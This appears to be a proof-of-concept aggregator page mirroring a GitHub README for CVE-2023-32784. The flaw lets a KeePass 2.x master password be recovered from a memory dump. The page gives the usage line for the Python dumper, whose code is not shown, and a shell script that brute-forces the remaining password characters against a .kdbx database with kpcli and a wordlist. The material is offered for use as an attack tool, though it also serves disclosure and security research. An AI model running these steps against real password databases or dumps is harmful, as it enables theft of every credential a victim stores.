Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-32784 PoC — KeePass 安全漏洞

Source
https://github.com/dawnl3ss/CVE-2023-32784
Associated Vulnerability
Title:KeePass 安全漏洞 (CVE-2023-32784)
Description:KeePass是一款开源的密码管理器。 KeePass 2.54之前的2.x版本存在安全漏洞,该漏洞源于即使工作区被锁定或不再运行,也可以从内存转储中恢复明文主密码。
Description
Retrieve the master password of a keepass database <= 2.53.1
Readme
# keepass-dump-masterkey

## Usage

`python3 poc.py <PathToDmp>`

## Preview

![](/img/preview.png)

As a reminder, the first character cannot be found in the dump, and for the second the script will only give you a few possibilities, in any case we recommend you to run the bruteforce on 2 chars with the script below 

```bash
#!/bin/sh
# Usage: ./keepass-pwn.sh Database.kdbx wordlist.txt (wordlist with 2 char)
while read i
do
    echo "Using password: \"$i\""
    echo "$i" | kpcli --kdb=$1 && exit 0
done < $2

```


>This script works very well in the case of a physical machine, for virtual machines it does not seem stable

Btw : the python script present in this project follows the reading of the following project: https://github.com/vdohney/keepass-password-dumper
File Snapshot

 [4.0K]  /data/pocs/c8f140790d0e25b4fffc98fd8269c455135f0704
├── [4.0K]  img
│   └── [ 30K]  preview.png
├── [2.7K]  poc.py
└── [ 778]  README.md

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.